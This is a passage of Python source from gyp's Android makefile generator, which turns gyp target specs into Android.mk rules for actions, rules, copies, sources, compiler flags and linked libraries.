if self.toolset == 'host':
self.WriteLn('LOCAL_IS_HOST_MODULE := true')
self.WriteLn('LOCAL_MULTILIB := $(GYP_HOST_MULTILIB)')
elif sdk_version > 0:
self.WriteLn('LOCAL_MODULE_TARGET_ARCH := '
'$(TARGET_$(GYP_VAR_PREFIX)ARCH)')
self.WriteLn('LOCAL_SDK_VERSION := %s' % sdk_version)
# Grab output directories; needed for Actions and Rules.
if self.toolset == 'host':
self.WriteLn('gyp_intermediate_dir := '
'$(call local-intermediates-dir,,$(GYP_HOST_VAR_PREFIX))')
else:
self.WriteLn('gyp_intermediate_dir := '
'$(call local-intermediates-dir,,$(GYP_VAR_PREFIX))')
self.WriteLn('gyp_shared_intermediate_dir := '
'$(call intermediates-dir-for,GYP,shared,,,$(GYP_VAR_PREFIX))')
self.WriteLn()
# List files this target depends on so that actions/rules/copies/sources
# can depend on the list.
# TODO: doesn't pull in things through transitive link deps; needed?
target_dependencies = [x[1] for x in deps if x[0] == 'path']
self.WriteLn('# Make sure our deps are built first.')
self.WriteList(target_dependencies, 'GYP_TARGET_DEPENDENCIES',
local_pathify=True)
# Actions must come first, since they can generate more OBJs for use below.
if 'actions' in spec:
self.WriteActions(spec['actions'], extra_sources, extra_outputs)
# Rules must be early like actions.
if 'rules' in spec:
self.WriteRules(spec['rules'], extra_sources, extra_outputs)
if 'copies' in spec:
self.WriteCopies(spec['copies'], extra_outputs)
# GYP generated outputs.
self.WriteList(extra_outputs, 'GYP_GENERATED_OUTPUTS', local_pathify=True)
# Set LOCAL_ADDITIONAL_DEPENDENCIES so that Android's build rules depend
# on both our dependency targets and our generated files.
self.WriteLn('# Make sure our deps and generated files are built first.')
self.WriteLn('LOCAL_ADDITIONAL_DEPENDENCIES := $(GYP_TARGET_DEPENDENCIES) '
'$(GYP_GENERATED_OUTPUTS)')
self.WriteLn()
# Sources.
if spec.get('sources', []) or extra_sources:
self.WriteSources(spec, configs, extra_sources)
self.WriteTarget(spec, configs, deps, link_deps, part_of_all,
write_alias_target)
# Update global list of target outputs, used in dependency tracking.
target_outputs[qualified_target] = ('path', self.output_binary)
# Update global list of link dependencies.
if self.type == 'static_library':
target_link_deps[qualified_target] = ('static', self.android_module)
elif self.type == 'shared_library':
target_link_deps[qualified_target] = ('shared', self.android_module)
self.fp.close()
return self.android_module
def WriteActions(self, actions, extra_sources, extra_outputs):
"""Write Makefile code for any 'actions' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
actions (used to make other pieces dependent on these
actions)
"""
for action in actions:
name = make.StringToMakefileVariable('%s_%s' % (self.relative_target,
action['action_name']))
self.WriteLn('### Rules for action "%s":' % action['action_name'])
inputs = action['inputs']
outputs = action['outputs']
# Build up a list of outputs.
# Collect the output dirs we'll need.
dirs = set()
for out in outputs:
if not out.startswith('$'):
print ('WARNING: Action for target "%s" writes output to local path '
'"%s".' % (self.target, out))
dir = os.path.split(out)[0]
if dir:
dirs.add(dir)
if int(action.get('process_outputs_as_sources', False)):
extra_sources += outputs
# Prepare the actual command.
command = gyp.common.EncodePOSIXShellList(action['action'])
if 'message' in action:
quiet_cmd = 'Gyp action: %s ($@)' % action['message']
else:
quiet_cmd = 'Gyp action: %s ($@)' % name
if len(dirs) > 0:
command = 'mkdir -p %s' % ' '.join(dirs) + '; ' + command
cd_action = 'cd $(gyp_local_path)/%s; ' % self.path
command = cd_action + command
# The makefile rules are all relative to the top dir, but the gyp actions
# are defined relative to their containing dir. This replaces the gyp_*
# variables for the action rule with an absolute version so that the
# output goes in the right place.
# Only write the gyp_* rules for the "primary" output (:1);
# it's superfluous for the "extra outputs", and this avoids accidentally
# writing duplicate dummy rules for those outputs.
main_output = make.QuoteSpaces(self.LocalPathify(outputs[0]))
self.WriteLn('%s: gyp_local_path := $(LOCAL_PATH)' % main_output)
self.WriteLn('%s: gyp_var_prefix := $(GYP_VAR_PREFIX)' % main_output)
self.WriteLn('%s: gyp_intermediate_dir := '
'$(abspath $(gyp_intermediate_dir))' % main_output)
self.WriteLn('%s: gyp_shared_intermediate_dir := '
'$(abspath $(gyp_shared_intermediate_dir))' % main_output)
# Android's envsetup.sh adds a number of directories to the path including
# the built host binary directory. This causes actions/rules invoked by
# gyp to sometimes use these instead of system versions, e.g. bison.
# The built host binaries may not be suitable, and can cause errors.
# So, we remove them from the PATH using the ANDROID_BUILD_PATHS variable
# set by envsetup.
self.WriteLn('%s: export PATH := $(subst $(ANDROID_BUILD_PATHS),,$(PATH))'
% main_output)
# Don't allow spaces in input/output filenames, but make an exception for
# filenames which start with '$(' since it's okay for there to be spaces
# inside of make function/macro invocations.
for input in inputs:
if not input.startswith('$(') and ' ' in input:
raise gyp.common.GypError(
'Action input filename "%s" in target %s contains a space' %
(input, self.target))
for output in outputs:
if not output.startswith('$(') and ' ' in output:
raise gyp.common.GypError(
'Action output filename "%s" in target %s contains a space' %
(output, self.target))
self.WriteLn('%s: %s $(GYP_TARGET_DEPENDENCIES)' %
(main_output, ' '.join(map(self.LocalPathify, inputs))))
self.WriteLn('\t@echo "%s"' % quiet_cmd)
self.WriteLn('\t$(hide)%s\n' % command)
for output in outputs[1:]:
# Make each output depend on the main output, with an empty command
# to force make to notice that the mtime has changed.
self.WriteLn('%s: %s ;' % (self.LocalPathify(output), main_output))
extra_outputs += outputs
self.WriteLn()
self.WriteLn()
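# Illustrative sketch (not from the original gyp source; target and file names
# are hypothetical): for one action with a single input and output, the rules
# written above take roughly this shape in the generated .mk file:
#
#   $(gyp_intermediate_dir)/foo.h: gyp_local_path := $(LOCAL_PATH)
#   $(gyp_intermediate_dir)/foo.h: gyp_var_prefix := $(GYP_VAR_PREFIX)
#   $(gyp_intermediate_dir)/foo.h: export PATH := $(subst $(ANDROID_BUILD_PATHS),,$(PATH))
#   $(gyp_intermediate_dir)/foo.h: $(LOCAL_PATH)/foo.in $(GYP_TARGET_DEPENDENCIES)
#   	@echo "Gyp action: generate foo ($@)"
#   	$(hide)cd $(gyp_local_path)/some/dir; mkdir -p $(gyp_intermediate_dir); ./gen.py $< $@
#
# Any extra outputs then get an empty rule that depends on this main output.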
def WriteRules(self, rules, extra_sources, extra_outputs):
"""Write Makefile code for any 'rules' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
rules (used to make other pieces dependent on these rules)
"""
if len(rules) == 0:
return
for rule in rules:
if len(rule.get('rule_sources', [])) == 0:
continue
name = make.StringToMakefileVariable('%s_%s' % (self.relative_target,
rule['rule_name']))
self.WriteLn('\n### Generated for rule "%s":' % name)
self.WriteLn('# "%s":' % rule)
inputs = rule.get('inputs')
for rule_source in rule.get('rule_sources', []):
(rule_source_dirname, rule_source_basename) = os.path.split(rule_source)
(rule_source_root, rule_source_ext) = \
os.path.splitext(rule_source_basename)
outputs = [self.ExpandInputRoot(out, rule_source_root,
rule_source_dirname)
for out in rule['outputs']]
dirs = set()
for out in outputs:
if not out.startswith('$'):
print ('WARNING: Rule for target %s writes output to local path %s'
% (self.target, out))
dir = os.path.dirname(out)
if dir:
dirs.add(dir)
extra_outputs += outputs
if int(rule.get('process_outputs_as_sources', False)):
extra_sources.extend(outputs)
components = []
for component in rule['action']:
component = self.ExpandInputRoot(component, rule_source_root,
rule_source_dirname)
if '$(RULE_SOURCES)' in component:
component = component.replace('$(RULE_SOURCES)',
rule_source)
components.append(component)
command = gyp.common.EncodePOSIXShellList(components)
cd_action = 'cd $(gyp_local_path)/%s; ' % self.path
command = cd_action + command
if dirs:
command = 'mkdir -p %s' % ' '.join(dirs) + '; ' + command
# We set up a rule to build the first output, and then set up
# a rule for each additional output to depend on the first.
outputs = map(self.LocalPathify, outputs)
main_output = outputs[0]
self.WriteLn('%s: gyp_local_path := $(LOCAL_PATH)' % main_output)
self.WriteLn('%s: gyp_var_prefix := $(GYP_VAR_PREFIX)' % main_output)
self.WriteLn('%s: gyp_intermediate_dir := '
'$(abspath $(gyp_intermediate_dir))' % main_output)
self.WriteLn('%s: gyp_shared_intermediate_dir := '
'$(abspath $(gyp_shared_intermediate_dir))' % main_output)
# See explanation in WriteActions.
self.WriteLn('%s: export PATH := '
'$(subst $(ANDROID_BUILD_PATHS),,$(PATH))' % main_output)
main_output_deps = self.LocalPathify(rule_source)
if inputs:
main_output_deps += ' '
main_output_deps += ' '.join([self.LocalPathify(f) for f in inputs])
self.WriteLn('%s: %s $(GYP_TARGET_DEPENDENCIES)' %
(main_output, main_output_deps))
self.WriteLn('\t%s\n' % command)
for output in outputs[1:]:
# Make each output depend on the main output, with an empty command
# to force make to notice that the mtime has changed.
self.WriteLn('%s: %s ;' % (output, main_output))
self.WriteLn()
self.WriteLn()
def WriteCopies(self, copies, extra_outputs):
"""Write Makefile code for any 'copies' from the gyp input.
extra_outputs: a list that will be filled in with any outputs of this action
(used to make other pieces dependent on this action)
"""
self.WriteLn('### Generated for copy rule.')
variable = make.StringToMakefileVariable(self.relative_target + '_copies')
outputs = []
for copy in copies:
for path in copy['files']:
# The Android build system does not allow generation of files into the
# source tree. The destination should start with a variable, which will
# typically be $(gyp_intermediate_dir) or
# $(gyp_shared_intermediate_dir). Note that we can't use an assertion
# because some of the gyp tests depend on this.
if not copy['destination'].startswith('$'):
print ('WARNING: Copy rule for target %s writes output to '
'local path %s' % (self.target, copy['destination']))
# LocalPathify() calls normpath, stripping trailing slashes.
path = Sourceify(self.LocalPathify(path))
filename = os.path.split(path)[1]
output = Sourceify(self.LocalPathify(os.path.join(copy['destination'],
filename)))
self.WriteLn('%s: %s $(GYP_TARGET_DEPENDENCIES) | $(ACP)' %
(output, path))
self.WriteLn('\t@echo Copying: $@')
self.WriteLn('\t$(hide) mkdir -p $(dir $@)')
self.WriteLn('\t$(hide) $(ACP) -rpf $< $@')
self.WriteLn()
outputs.append(output)
self.WriteLn('%s = %s' % (variable,
' '.join(map(make.QuoteSpaces, outputs))))
extra_outputs.append('$(%s)' % variable)
self.WriteLn()
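# Illustrative sketch (not from the original gyp source; paths are
# hypothetical): copying 'data/foo.txt' into $(gyp_intermediate_dir) would
# emit make text along these lines:
#
#   $(gyp_intermediate_dir)/foo.txt: $(LOCAL_PATH)/data/foo.txt $(GYP_TARGET_DEPENDENCIES) | $(ACP)
#   	@echo Copying: $@
#   	$(hide) mkdir -p $(dir $@)
#   	$(hide) $(ACP) -rpf $< $@
#
#   <target>_copies = $(gyp_intermediate_dir)/foo.txt
#
# and '$(<target>_copies)' is appended to extra_outputs.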
def WriteSourceFlags(self, spec, configs):
"""Write out the flags and include paths used to compile source files for
the current target.
Args:
spec, configs: input from gyp.
"""
for configname, config in sorted(configs.iteritems()):
extracted_includes = []
self.WriteLn('\n# Flags passed to both C and C++ files.')
cflags, includes_from_cflags = self.ExtractIncludesFromCFlags(
config.get('cflags', []) + config.get('cflags_c', []))
extracted_includes.extend(includes_from_cflags)
self.WriteList(cflags, 'MY_CFLAGS_%s' % configname)
self.WriteList(config.get('defines'), 'MY_DEFS_%s' % configname,
prefix='-D', quoter=make.EscapeCppDefine)
self.WriteLn('\n# Include paths placed before CFLAGS/CPPFLAGS')
includes = list(config.get('include_dirs', []))
includes.extend(extracted_includes)
includes = map(Sourceify, map(self.LocalPathify, includes))
includes = self.NormalizeIncludePaths(includes)
self.WriteList(includes, 'LOCAL_C_INCLUDES_%s' % configname)
self.WriteLn('\n# Flags passed to only C++ (and not C) files.')
self.WriteList(config.get('cflags_cc'), 'LOCAL_CPPFLAGS_%s' % configname)
self.WriteLn('\nLOCAL_CFLAGS := $(MY_CFLAGS_$(GYP_CONFIGURATION)) '
'$(MY_DEFS_$(GYP_CONFIGURATION))')
# Undefine ANDROID for host modules
# TODO: the source code should not use macro ANDROID to tell if it's host
# or target module.
if self.toolset == 'host':
self.WriteLn('# Undefine ANDROID for host modules')
self.WriteLn('LOCAL_CFLAGS += -UANDROID')
self.WriteLn('LOCAL_C_INCLUDES := $(GYP_COPIED_SOURCE_ORIGIN_DIRS) '
'$(LOCAL_C_INCLUDES_$(GYP_CONFIGURATION))')
self.WriteLn('LOCAL_CPPFLAGS := $(LOCAL_CPPFLAGS_$(GYP_CONFIGURATION))')
# Android uses separate flags for assembly file invocations, but gyp expects
# the same CFLAGS to be applied:
self.WriteLn('LOCAL_ASFLAGS := $(LOCAL_CFLAGS)')
def WriteSources(self, spec, configs, extra_sources):
"""Write Makefile code for any 'sources' from the gyp input.
These are source files necessary to build the current target.
We need to handle shared_intermediate directory source files as
a special case by copying them to the intermediate directory and
treating them as generated sources. Otherwise the Android build
rules won't pick them up.
Args:
spec, configs: input from gyp.
extra_sources: Sources generated from Actions or Rules.
"""
sources = filter(make.Compilable, spec.get('sources', []))
generated_not_sources = [x for x in extra_sources if not make.Compilable(x)]
extra_sources = filter(make.Compilable, extra_sources)
# Determine and output the C++ extension used by these sources.
# We simply find the first C++ file and use that extension.
all_sources = sources + extra_sources
local_cpp_extension = '.cpp'
for source in all_sources:
(root, ext) = os.path.splitext(source)
if IsCPPExtension(ext):
local_cpp_extension = ext
break
if local_cpp_extension != '.cpp':
self.WriteLn('LOCAL_CPP_EXTENSION := %s' % local_cpp_extension)
# We need to move any non-generated sources that are coming from the
# shared intermediate directory out of LOCAL_SRC_FILES and put them
# into LOCAL_GENERATED_SOURCES. We also need to move over any C++ files
# that don't match our local_cpp_extension, since Android will only
# generate Makefile rules for a single LOCAL_CPP_EXTENSION.
local_files = []
for source in sources:
(root, ext) = os.path.splitext(source)
if '$(gyp_shared_intermediate_dir)' in source:
extra_sources.append(source)
elif '$(gyp_intermediate_dir)' in source:
extra_sources.append(source)
elif IsCPPExtension(ext) and ext != local_cpp_extension:
extra_sources.append(source)
else:
local_files.append(os.path.normpath(os.path.join(self.path, source)))
# For any generated source, if it is coming from the shared intermediate
# directory then we add a Make rule to copy them to the local intermediate
# directory first. This is because the Android LOCAL_GENERATED_SOURCES
# must be in the local module intermediate directory for the compile rules
# to work properly. If the file has the wrong C++ extension, then we add
# a rule to copy that to intermediates and use the new version.
final_generated_sources = []
# If a source file gets copied, we still need to add the original source
# directory as a header search path, because GCC searches for headers in the
# directory that contains the source file by default.
origin_src_dirs = []
for source in extra_sources:
local_file = source
if not '$(gyp_intermediate_dir)/' in local_file:
basename = os.path.basename(local_file)
local_file = '$(gyp_intermediate_dir)/' + basename
(root, ext) = os.path.splitext(local_file)
if IsCPPExtension(ext) and ext != local_cpp_extension:
local_file = root + local_cpp_extension
if local_file != source:
self.WriteLn('%s: %s' % (local_file, self.LocalPathify(source)))
self.WriteLn('\tmkdir -p $(@D); cp $< $@')
origin_src_dirs.append(os.path.dirname(source))
final_generated_sources.append(local_file)
# We add back in all of the non-compilable stuff to make sure that the
# make rules have dependencies on them.
final_generated_sources.extend(generated_not_sources)
self.WriteList(final_generated_sources, 'LOCAL_GENERATED_SOURCES')
origin_src_dirs = gyp.common.uniquer(origin_src_dirs)
origin_src_dirs = map(Sourceify, map(self.LocalPathify, origin_src_dirs))
self.WriteList(origin_src_dirs, 'GYP_COPIED_SOURCE_ORIGIN_DIRS')
self.WriteList(local_files, 'LOCAL_SRC_FILES')
# Write out the flags used to compile the source; this must be done last
# so that GYP_COPIED_SOURCE_ORIGIN_DIRS can be used as an include path.
self.WriteSourceFlags(spec, configs)
def ComputeAndroidModule(self, spec):
"""Return the Android module name used for a gyp spec.
We use the complete qualified target name to avoid collisions between
duplicate targets in different directories. We also add a suffix to
distinguish gyp-generated module names.
"""
if int(spec.get('android_unmangled_name', 0)):
assert self.type != 'shared_library' or self.target.startswith('lib')
return self.target
if self.type == 'shared_library':
# For reasons of convention, the Android build system requires that all
# shared library modules are named 'libfoo' when generating -l flags.
prefix = 'lib_'
else:
prefix = ''
if spec['toolset'] == 'host':
suffix = '_$(TARGET_$(GYP_VAR_PREFIX)ARCH)_host_gyp'
else:
suffix = '_gyp'
if self.path:
middle = make.StringToMakefileVariable('%s_%s' % (self.path, self.target))
else:
middle = make.StringToMakefileVariable(self.target)
return ''.join([prefix, middle, suffix])
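# Illustrative examples (hypothetical values, not from the original source):
# assuming self.path == 'foo' and self.target == 'base',
#   shared_library, target toolset -> 'lib_foo_base_gyp'
#   static_library, host toolset   -> 'foo_base_$(TARGET_$(GYP_VAR_PREFIX)ARCH)_host_gyp'
# The middle component is whatever make.StringToMakefileVariable() produces.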
def ComputeOutputParts(self, spec):
"""Return the 'output basename' of a gyp spec, split into filename + ext.
Android libraries must be named the same thing as their module name,
otherwise the linker can't find them, so product_name and so on must be
ignored if we are building a library, and the "lib" prepending is
not done for Android.
"""
assert self.type != 'loadable_module' # TODO: not supported?
target = spec['target_name']
target_prefix = ''
target_ext = ''
if self.type == 'static_library':
target = self.ComputeAndroidModule(spec)
target_ext = '.a'
elif self.type == 'shared_library':
target = self.ComputeAndroidModule(spec)
target_ext = '.so'
elif self.type == 'none':
target_ext = '.stamp'
elif self.type != 'executable':
print ("ERROR: What output file should be generated?",
"type", self.type, "target", target)
if self.type != 'static_library' and self.type != 'shared_library':
target_prefix = spec.get('product_prefix', target_prefix)
target = spec.get('product_name', target)
product_ext = spec.get('product_extension')
if product_ext:
target_ext = '.' + product_ext
target_stem = target_prefix + target
return (target_stem, target_ext)
def ComputeOutputBasename(self, spec):
"""Return the 'output basename' of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'libfoobar.so'
"""
return ''.join(self.ComputeOutputParts(spec))
def ComputeOutput(self, spec):
"""Return the 'output' (full output path) of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'$(obj)/baz/libfoobar.so'
"""
if self.type == 'executable':
# We install host executables into shared_intermediate_dir so they can be
# run by gyp rules that refer to PRODUCT_DIR.
path = '$(gyp_shared_intermediate_dir)'
elif self.type == 'shared_library':
if self.toolset == 'host':
path = '$($(GYP_HOST_VAR_PREFIX)HOST_OUT_INTERMEDIATE_LIBRARIES)'
else:
path = '$($(GYP_VAR_PREFIX)TARGET_OUT_INTERMEDIATE_LIBRARIES)'
else:
# Other targets just get built into their intermediate dir.
if self.toolset == 'host':
path = ('$(call intermediates-dir-for,%s,%s,true,,'
'$(GYP_HOST_VAR_PREFIX))' % (self.android_class,
self.android_module))
else:
path = ('$(call intermediates-dir-for,%s,%s,,,$(GYP_VAR_PREFIX))'
% (self.android_class, self.android_module))
assert spec.get('product_dir') is None # TODO: not supported?
return os.path.join(path, self.ComputeOutputBasename(spec))
def NormalizeIncludePaths(self, include_paths):
""" Normalize include_paths.
Convert absolute paths to relative to the Android top directory.
Args:
include_paths: A list of unprocessed include paths.
Returns:
A list of normalized include paths.
"""
normalized = []
for path in include_paths:
if path[0] == '/':
path = gyp.common.RelativePath(path, self.android_top_dir)
normalized.append(path)
return normalized
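# Illustrative usage (hypothetical paths): with android_top_dir '/src/android',
#   NormalizeIncludePaths(['/src/android/external/zlib', 'local/include'])
#   would return ['external/zlib', 'local/include'].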
def ExtractIncludesFromCFlags(self, cflags):
"""Extract includes "-I..." out from cflags
Args:
cflags: A list of compiler flags, which may be mixed with "-I.."
Returns:
A tuple of lists: (clean_cflags, include_paths). "-I.." is trimmed.
"""
clean_cflags = []
include_paths = []
for flag in cflags:
if flag.startswith('-I'):
include_paths.append(flag[2:])
else:
clean_cflags.append(flag)
return (clean_cflags, include_paths)
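# Illustrative usage (hypothetical flags):
#   ExtractIncludesFromCFlags(['-Wall', '-Iexternal/zlib', '-O2'])
#   would return (['-Wall', '-O2'], ['external/zlib']).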
def FilterLibraries(self, libraries):
"""Filter the 'libraries' key to separate things that shouldn't be ldflags.
Library entries that look like filenames should be converted to android
module names instead of being passed to the linker as flags.
Args:
libraries: the value of spec.get('libraries')
Returns:
A tuple (static_lib_modules, dynamic_lib_modules, ldflags)
"""
static_lib_modules = []
dynamic_lib_modules = []
ldflags = []
for libs in libraries:
# Libs can have multiple words.
for lib in libs.split():
# Filter the system libraries, which are added by default by the Android
# build system.
if (lib == '-lc' or lib == '-lstdc++' or lib == '-lm' or
lib.endswith('libgcc.a')):
continue
match = re.search(r'([^/]+)\.a$', lib)
if match:
static_lib_modules.append(match.group(1))
continue
match = re.search(r'([^/]+)\.so$', lib)
if match:
dynamic_lib_modules.append(match.group(1))
continue
if lib.startswith('-l'):
ldflags.append(lib)
return (static_lib_modules, dynamic_lib_modules, ldflags)
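# Illustrative usage (hypothetical library list):
#   FilterLibraries(['-lc -llog', 'out/libfoo.a', 'out/libbar.so', 'x/libgcc.a'])
#   would return (['libfoo'], ['libbar'], ['-llog']),
# since -lc and libgcc.a are dropped as Android system defaults.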
def ComputeDeps(self, spec):
"""Compute the dependencies of a gyp spec.
Returns a tuple (deps, link_deps), where each is a list of
filenames that will need to be put in front of make for either
building (deps) or linking (link_deps).
"""
deps = []
link_deps = []
if 'dependencies' in spec:
deps.extend([target_outputs[dep] for dep in spec['dependencies']
if target_outputs[dep]])
for dep in spec['dependencies']:
if dep in target_link_deps:
link_deps.append(target_link_deps[dep])
deps.extend(link_deps)
return (gyp.common.uniquer(deps), gyp.common.uniquer(link_deps))
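# Illustrative sketch (hypothetical qualified target names): with
#   target_outputs   == {'a': ('path', 'out/a.stamp'), 'b': ('path', 'out/libb.so')}
#   target_link_deps == {'b': ('shared', 'b_gyp')}
# a spec whose 'dependencies' are ['a', 'b'] would yield roughly
#   deps      == [('path', 'out/a.stamp'), ('path', 'out/libb.so'), ('shared', 'b_gyp')]
#   link_deps == [('shared', 'b_gyp')]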
def WriteTargetFlags(self, spec, configs, link_deps):
"""Write Makefile code to specify the link flags and library dependencies.
spec, configs: input from gyp.
link_deps: link dependency list; see ComputeDeps()
"""
# Libraries (i.e. -lfoo)
# These must be included even for static libraries as some of them provide
# implicit include paths through the build system.
libraries = gyp.common.uniquer(spec.get('libraries', []))
static_libs, dynamic_libs, ldflags_libs = self.FilterLibraries(libraries)
if self.type != 'static_library':
for configname, config in sorted(configs.iteritems()):
ldflags = list(config.get('ldflags', []))
self.WriteLn('')
self.WriteList(ldflags, 'LOCAL_LDFLAGS_%s' % configname)
self.WriteList(ldflags_libs, 'LOCAL_GYP_LIBS')
self.WriteLn('LOCAL_LDFLAGS := $(LOCAL_LDFLAGS_$(GYP_CONFIGURATION)) '
'$(LOCAL_GYP_LIBS)')
# Link dependencies (i.e. other gyp targets this target depends on)
# These need not be included for static libraries as within the gyp build
# we do not use the implicit include path mechanism.
if self.type != 'static_library':
static_link_deps = [x[1] for x in link_deps if x[0] == 'static']
shared_link_deps = [x[1] for x in link_deps if x[0] == 'shared']
else:
static_link_deps = []
shared_link_deps = []
# Only write the lists if they are non-empty.
if static_libs or static_link_deps:
self.WriteLn('')
self.WriteList(static_libs + static_link_deps,
'LOCAL_STATIC_LIBRARIES')
self.WriteLn('# Enable grouping to fix circular references')
self.WriteLn('LOCAL_GROUP_STATIC_LIBRARIES := true')
if dynamic_libs or shared_link_deps:
self.WriteLn('')
self.WriteList(dynamic_libs + shared_link_deps,
'LOCAL_SHARED_LIBRARIES')
def WriteTarget(self, spec, configs, deps, link_deps, part_of_all,
write_alias_target):
"""Write Makefile code to produce the final target of the gyp spec.
spec, configs: input from gyp.
deps, link_deps: dependency lists; see ComputeDeps()
part_of_all: flag indicating this target is part of 'all'
write_alias_target: flag indicating whether to create short aliases for this
target
"""
self.WriteLn('### Rules for final target.')
if self.type != 'none':
self.WriteTargetFlags(spec, configs, link_deps)
settings = spec.get('aosp_build_settings', {})
if settings:
self.WriteLn('### Set directly by aosp_build_settings.')
for k, v in settings.iteritems():
if isinstance(v, list):
self.WriteList(v, k)
else:
self.WriteLn('%s := %s' % (k, make.QuoteIfNecessary(v)))
self.WriteLn('')
# Add to the set of targets which represent the gyp 'all' target. We use the
# name 'gyp_all_modules' as the Android build system doesn't allow the use
# of the Make target 'all' and because 'all_modules' is the equivalent of
# the Make target 'all' on Android.
if part_of_all and write_alias_target:
self.WriteLn('# Add target alias to "gyp_all_modules" target.')
self.WriteLn('.PHONY: gyp_all_modules')
self.WriteLn('gyp_all_modules: %s' % self.android_module)
self.WriteLn('')
# Add an alias from the gyp target name to the Android module name. This
# simplifies manual builds of the target, and is required by the test
# framework.
if self.target != self.android_module and write_alias_target:
self.WriteLn('# Alias gyp target name.')
self.WriteLn('.PHONY: %s' % self.target)
self.WriteLn('%s: %s' % (self.target, self.android_module))
self.WriteLn('')
# Add the command to trigger build of the target type depending
# on the toolset. Ex: BUILD_STATIC_LIBRARY vs. BUILD_HOST_STATIC_LIBRARY
# NOTE: This has to come last!
modifier = ''
if self.toolset == 'host':
modifier = 'HOST_'
if self.type == 'static_library':
self.WriteLn('include $(BUILD_%sSTATIC_LIBRARY)' % modifier)
elif self.type == 'shared_library':
self.WriteLn('LOCAL_PRELINK_MODULE := false')
self.WriteLn('include $(BUILD_%sSHARED_LIBRARY)' % modifier)
elif self.type == 'executable':
self.WriteLn('LOCAL_CXX_STL := libc++_static')
# Executables are for build and test purposes only, so they're installed
# to a directory that doesn't get included in the system image.
self.WriteLn('LOCAL_MODULE_PATH := $(gyp_shared_intermediate_dir)')
self.WriteLn('include $(BUILD_%sEXECUTABLE)' % modifier)
else:
self.WriteLn('LOCAL_MODULE_PATH := $(PRODUCT_OUT)/gyp_stamp')
self.WriteLn('LOCAL_UNINSTALLABLE_MODULE := true')
if self.toolset == 'target':
self.WriteLn('LOCAL_2ND_ARCH_VAR_PREFIX := $(GYP_VAR_PREFIX)')
else:
self.WriteLn('LOCAL_2ND_ARCH_VAR_PREFIX := $(GYP_HOST_VAR_PREFIX)')
self.WriteLn()
self.WriteLn('include $(BUILD_SYSTEM)/base_rules.mk')
self.WriteLn()
self.WriteLn('$(LOCAL_BUILT_MODULE): $(LOCAL_ADDITIONAL_DEPENDENCIES)')
self.WriteLn('\t$(hide) echo "Gyp timestamp: $@"')
self.WriteLn('\t$(hide) mkdir -p $(dir $@)')
self.WriteLn('\t$(hide) touch $@')
self.WriteLn()
self.WriteLn('LOCAL_2ND_ARCH_VAR_PREFIX :=')
def WriteList(self, value_list, variable=None, prefix='',
quoter=make.QuoteIfNecessary, local_pathify=False):
"""Write a variable definition that is a list of values.
E.g. WriteList(['a','b'], 'foo', prefix='blah') writes out
foo = blaha blahb
but in a pretty-printed style.
"""
values = ''
if value_list:
value_list = [quoter(prefix + l) for l in value_list]
if local_pathify:
value_list = [self.LocalPathify(l) for l in value_list]
values = ' \\\n\t' + ' \\\n\t'.join(value_list)
self.fp.write('%s :=%s\n\n' % (variable, values))
def WriteLn(self, text=''):
self.fp.write(text + '\n')
def LocalPathify(self, path):
"""Convert a subdirectory-relative path into a normalized path which starts
with the make variable $(LOCAL_PATH) (i.e. the top of the project tree).
Absolute paths, or paths that contain variables, are just normalized."""
if '$(' in path or os.path.isabs(path):
# path is not a file in the project tree in this case, but calling
# normpath is still important for trimming trailing slashes.
return os.path.normpath(path)
local_path = os.path.join('$(LOCAL_PATH)', self.path, path)
local_path = os.path.normpath(local_path)
# Check that normalizing the path didn't ../ itself out of $(LOCAL_PATH)
# - i.e. that the resulting path is still inside the project tree. The
# path may legitimately have ended up containing just $(LOCAL_PATH), though,
# so we don't look for a slash.
assert local_path.startswith('$(LOCAL_PATH)'), (
'Path %s attempts to escape from gyp path %s !' % (path, self.path))
return local_path
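# Illustrative usage (hypothetical paths): with self.path == 'foo/bar',
#   LocalPathify('baz/qux.c')                   -> '$(LOCAL_PATH)/foo/bar/baz/qux.c'
#   LocalPathify('$(gyp_intermediate_dir)/x.c') -> '$(gyp_intermediate_dir)/x.c'
#   LocalPathify('/abs/include')                -> '/abs/include'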
def ExpandInputRoot(self, template, expansion, dirname):
if '%(INPUT_ROOT)s' not in template and '%(INPUT_DIRNAME)s' not in template:
return template
path = template % {
'INPUT_ROOT': expansion,
'INPUT_DIRNAME': dirname,
}
return os.path.normpath(path)
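# Illustrative usage (hypothetical templates):
#   ExpandInputRoot('%(INPUT_ROOT)s.pb.cc', 'msg', 'proto/dir')    -> 'msg.pb.cc'
#   ExpandInputRoot('%(INPUT_DIRNAME)s/gen.h', 'msg', 'proto/dir') -> 'proto/dir/gen.h'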
def PerformBuild(data, configurations, params):
# The android backend only supports the default configuration.
options = params['options']
makefile = os.path.abspath(os.path.join(options.toplevel_dir,
'GypAndroid.mk'))
env = dict(os.environ)
env['ONE_SHOT_MAKEFILE'] = makefile
arguments = ['make', '-C', os.environ['ANDROID_BUILD_TOP'], 'gyp_all_modules']
print 'Building: %s' % arguments
subprocess.check_call(arguments, env=env)
def GenerateOutput(target_list, target_dicts, data, params):
options = params['options']
generator_flags = params.get('generator_flags', {})
builddir_name = generator_flags.get('output_dir', 'out')
limit_to_target_all = generator_flags.get('limit_to_target_all', False)
write_alias_targets = generator_flags.get('write_alias_targets', True)
sdk_version = generator_flags.get('aosp_sdk_version', 0)
android_top_dir = os.environ.get('ANDROID_BUILD_TOP')
assert android_top_dir, '$ANDROID_BUILD_TOP not set; you need to run lunch.'
def CalculateMakefilePath(build_file, base_name):
"""Determine where to write a Makefile for a given gyp file."""
# Paths in gyp files are relative to the .gyp file, but we want
# paths relative to the source root for the master makefile. Grab
# the path of the .gyp file as the base to relativize against.
# E.g. "foo/bar" when we're constructing targets for "foo/bar/baz.gyp".
base_path = gyp.common.RelativePath(os.path.dirname(build_file),
options.depth)
# We write the file in the base_path directory.
output_file = os.path.join(options.depth, base_path, base_name)
assert not options.generator_output, (
'The Android backend does not support options.generator_output.')
base_path = gyp.common.RelativePath(os.path.dirname(build_file),
options.toplevel_dir)
return base_path, output_file
# TODO: search for the first non-'Default' target. This can go
# away when we add verification that all targets have the
# necessary configurations.
default_configuration = None
toolsets = set([target_dicts[target]['toolset'] for target in target_list])
for target in target_list:
spec = target_dicts[target]
if spec['default_configuration'] != 'Default':
